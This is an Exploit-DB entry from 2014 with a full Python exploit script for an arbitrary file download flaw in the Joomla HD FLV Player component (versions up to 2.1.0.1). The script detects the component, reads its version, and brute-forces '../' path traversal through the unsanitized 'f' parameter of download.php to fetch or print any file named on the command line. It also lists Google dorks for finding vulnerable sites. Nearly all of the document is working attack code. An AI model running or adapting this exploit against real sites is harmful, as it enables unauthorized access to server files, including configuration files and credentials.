Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download

EDB-ID:

35246

CVE:





Platform:

PHP

Date:

2014-11-15


#!/usr/bin/env python
#
# Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1:  inurl:/component/hdflvplayer/
# Dork google 2:  inurl:com_hdflvplayer    
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: 
#       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
#       The variable "f" is not sanitized.
#       Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/QvBTKFLBQ20
#
#
# Http connection
import urllib, urllib2
# String manipulation
import re
# Time management
import time
# Args management
import optparse
# Error management
import sys

banner = """
        _______                      __           ___ ___ ______
       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
       |:  1   |                                 |:  |   |:  1    /
       |::.. . |                                 |::.|:. |::.. . /
       `-------'                                 `--- ---`------'
        _______ ___     ___ ___     _______ __
       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
       |:  |   |:  1   |:  1   |   |:  |            |_____|
       |::.|   |::.. . |\:.. ./    |::.|
       `---'   `-------' `---'     `---'

                                         <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                          homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                        https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url


def checkcomponent(url,headers):

    try:
        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        print '[X] Connection Error'

def checkversion(url,headers):

    try:
        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
        response = urllib2.urlopen(req).readlines()

        for line_version in response:

            if not line_version.find("<version>") == -1:

                VER = re.compile('>(.*?)<').search(line_version).group(1)

                sys.stdout.write("\r[+] Checking Version: "+str(VER))
        print("")

    except urllib2.HTTPError:
       sys.stdout.write("\r[+] Checking Version: Unknown")

    except urllib2.URLError:
        print("\n[X] Connection Error")
        sys.exit(1)

def connection(url,headers,pathtrav):

    char = "../"
    bar = "#"
    s = ""
    barcount = ""

    for a in range(1,20):

        s += char
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()

        try:
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
            response = urllib2.urlopen(req)

            content = response.read()

            if content != "" and not "failed to open stream" in content:
                print("\n[!] VULNERABLE")
                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                print("")
                print("[+] Do you want [D]ownload or [R]ead the file?")
                print("[+]")
                sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")

                download = set(['d'])
                read  = set(['r'])

                while True:
                    choice = raw_input().lower()
                    if choice in download:
                        filedown = pathtrav.split('/')[-1]
                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                        print("[!] DOWNLOADED!")
                        print("[!] Check file: "+filedown)
                        return True
                    elif choice in read:
                        print("")
                        print content
                        return True
                    else:
                        sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")

        except urllib2.HTTPError:
            #print '[X] HTTP Error'
            pass
        except urllib2.URLError:
            print '\n[X] Connection Error'

        time.sleep(1)
    print("\n[X] File not found or fixed component :(")

commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file to check",
                  )
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = options.file

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)